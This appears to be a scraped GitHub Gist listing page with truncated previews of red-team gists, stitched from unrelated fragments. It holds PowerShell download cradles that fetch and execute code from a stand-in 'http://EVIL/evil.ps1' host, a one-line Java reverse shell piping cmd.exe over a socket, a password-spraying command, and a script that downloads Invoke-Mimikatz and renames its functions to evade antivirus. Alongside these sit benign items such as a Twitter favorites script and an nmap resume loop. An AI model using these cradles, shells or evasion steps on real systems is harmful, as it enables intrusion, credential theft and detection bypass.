With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| String host="localhost"; | |
| int port=8044; | |
| String cmd="cmd.exe"; | |
| Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |
leftp
/ Authproxyserver.ps1
Last active
April 10, 2025 08:08
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #DISCLAIMER | |
| #I'm not the original author of the script... | |
| #Original git repo vanished | |
| function String-to-ByteArray ($String) | |
| { | |
| $ByteArray=@() | |
| For ( $i = 0; $i -lt ($String.Length/2); $i++ ) | |
| { | |
| $Chars=$String.Substring($i*2,2) |
HarmJ0y
/ PowerView-3.0-tricks.ps1
Last active
December 11, 2025 18:41
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
curi0usJack
/ minicars.sh
Last active
April 26, 2021 15:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
| # Uncomment below two lines to clean comments from all .ps1 files in ./ | |
| #find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \; | |
| #find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \; | |
| sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1 | |
| sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1 |
curi0usJack
/ twitterfavlinks.py
Last active
May 3, 2020 07:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # twitterfavlinks.py - Throw back all your favorites that contain a url. Get any applicable redirects. Note there are Twitter API | |
| # limits, so if you have a gazillion favorites, you probably won't get them all. YMMV | |
| # | |
| # Author: @curi0usJack | |
| # | |
| # Dependencies: | |
| # Tweepy: sudo pip install tweepy | |
| # Twitter API access. Set up here: https://apps.twitter.com/ | |
| import tweepy |
curi0usJack
/ .htaccess
Last active
September 23, 2025 22:00
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| # Save this file into something like /etc/apache2/redirect.rules. | |
| # Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
| # | |
| # Include /etc/apache2/redirect.rules | |
| # |
mainframed
/ until_nmap.sh
Created
October 18, 2017 04:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Nmap can crash when scanning large ranges | |
| # To use this script, start your scan with whatever | |
| # nmap options you want making sure you use -oA <filename> | |
| # or -oG <filename> (you need the gnmap file) then cancel | |
| # the scan. replace <filename> below and run this script. | |
| # It will also record when it failed to a file called failed.txt | |
| until nmap --resume <filename>.gnmap |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. | |
| # | |
| # This software is provided under under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. | |
| # | |
| # A similar approach to smbexec but executing commands through WMI. | |
| # Main advantage here is it runs under the user (has to be Admin) | |
| # account, not SYSTEM, plus, it doesn't generate noisy messages |
OlderNewer